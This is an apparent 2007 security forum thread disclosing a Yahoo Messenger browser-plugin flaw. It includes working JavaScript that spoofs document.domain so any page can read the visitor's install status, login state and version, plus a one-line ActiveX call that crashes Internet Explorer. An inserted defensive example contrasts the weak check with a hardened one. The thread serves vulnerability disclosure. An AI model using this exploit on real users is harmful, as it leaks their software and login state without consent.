Sla.ckers.org
Yahoo Messenger information disclosure
Posted by: trev
Date: April 05, 2007 11:41AM

Yahoo Messenger installs a browser plugin called "Yahoo Application State Plugin" (npYState.dll). The purpose of this plugin is to tell Yahoo pages whether you have Yahoo Messenger installed, which version you have and whether you are currently logged in. Only yahoo.com is supposed to have access to this information; to ensure this, the plugin tests the document.domain property of the page that loaded it. However, at least in Firefox and Opera you can manipulate the value of document.domain to get access to the information from any web page:

<object id="npystate" type="application/x-vnd.yahoo.applicationState"></object>
<script type="text/javascript">
  var origDocument = document;
  try {
    document.__defineGetter__("domain", function(){return "yahoo.com"});
  } catch(e) {}
  try {
    window.document = {domain: "yahoo.com"};
  } catch(e) {}

  window.onload = function() {
    var info = origDocument.getElementById("npystate").applicationInfo("msgr");
    alert(info.installed() ? "Yahoo! Messenger is installed" : "Yahoo! Messenger is not installed");
    alert(info.isLoggedIn() ? "You are currently logged in" : "You are not logged in");

    var version = info.version();
    alert("Yahoo! Messenger version: " + version.major + "." + version.minor + "." + version.hiBuild + "." + version.loBuild);

    alert("Yahoo! Messenger locale: " + info.internationalCode());
  }
</script>

I suspect that some variation of this will work in Internet Explorer as well.



Edited 1 time(s). Last edit at 04/05/2007 12:11PM by trev.

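Added example, not part of the original post and not Yahoo's code: a simplified model of why a check based on document.domain fails, next to a check that uses only the URL the browser host holds for the page. The page objects, function names and URLs are constructed assumptions; how the real plugin reads document.domain is not shown in the thread.

```javascript
// Simplified model (added example): why a plugin must not take the page's
// origin from a script-visible property. All names here are hypothetical.

// Build a constructed "page": hostUrl is what the browser loaded (page script
// cannot change it); document.domain starts out matching it but is writable.
function makePage(hostUrl) {
  const doc = { domain: new URL(hostUrl).hostname };
  return { hostUrl, window: { document: doc } };
}

// True if host is yahoo.com or a subdomain of it (match on a dot boundary).
function isYahooHost(host) {
  host = String(host).toLowerCase();
  return host === "yahoo.com" || host.endsWith(".yahoo.com");
}

// Weak check, as the post describes it: trust whatever document.domain returns.
function weakCheck(page) {
  return isYahooHost(page.window.document.domain);
}

// Hardened check: use only the URL held by the host, and require http(s).
function hardenedCheck(page) {
  let url;
  try { url = new URL(page.hostUrl); } catch (e) { return false; }
  if (url.protocol !== "https:" && url.protocol !== "http:") return false;
  return isYahooHost(url.hostname);
}

// Run both checks over constructed pages. The second page redefines the getter
// the way the post's page does (defineProperty replaces __defineGetter__).
function demo() {
  const legit = makePage("http://www.yahoo.com/");
  const other = makePage("http://other.example/");
  Object.defineProperty(other.window.document, "domain",
    { get: () => "yahoo.com" });
  const lookalike = makePage("http://notyahoo.com/");
  return [legit, other, lookalike].map(p => ({
    url: p.hostUrl, weak: weakCheck(p), hardened: hardenedCheck(p),
  }));
}

console.log(demo());
```

Only the second page separates the two checks: the weak check accepts it because the getter was replaced, while the hardened check never consults anything the page can redefine.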
Re: Yahoo Messenger information disclosure
Posted by: rsnake
Date: April 05, 2007 06:16PM

I take it I have to have this installed for it to work? :) It just popped up a plugin error on this computer. Is there any way to suppress that error if it's not installed?

- RSnake
Gotta love it. http://ha.ckers.org

Re: Yahoo Messenger information disclosure
Posted by: trev
Date: April 05, 2007 06:27PM

Yahoo checks navigator.plugins["Yahoo Application State Plugin"] before creating the object so it doesn't pop up any messages. But I didn't have Yahoo Messenger installed myself; I have a copy of npYState.dll on my computer from the crash testing. Copy it into the plugins directory of the browser, create a few registry entries (Process Monitor shows you which ones it is looking for) and the plugin will report all the trash you feed it. I can also send you YPagerChecker.dll (the ActiveX variation of the same thing) if you want to give it a try.



Edited 2 time(s). Last edit at 04/05/2007 06:33PM by trev.

Re: Yahoo Messenger information disclosure
Posted by: rsnake
Date: April 05, 2007 10:27PM

It does give me the "Additional Plugins are required to display all the media on this page." error. The reason I'm asking if there is a way to suppress that is I am working on something to do detection of this sort of thing but it's super noisy if it fails (in this case with the warning).

- RSnake
Gotta love it. http://ha.ckers.org

Re: Yahoo Messenger information disclosure
Posted by: trev
Date: April 06, 2007 04:55AM

As I said, if navigator.plugins["Yahoo Application State Plugin"] is undefined then npYState.dll is not installed and you don't have to try - no warning then.

Re: Yahoo Messenger information disclosure
Posted by: trev
Date: April 06, 2007 05:12AM

At least some result from my experiments with Internet Explorer:
new ActiveXObject("YPagerChecker.MessengerChecker");
This JScript code will crash the browser if Yahoo Messenger is installed (null pointer exception in YPagerChecker.dll).
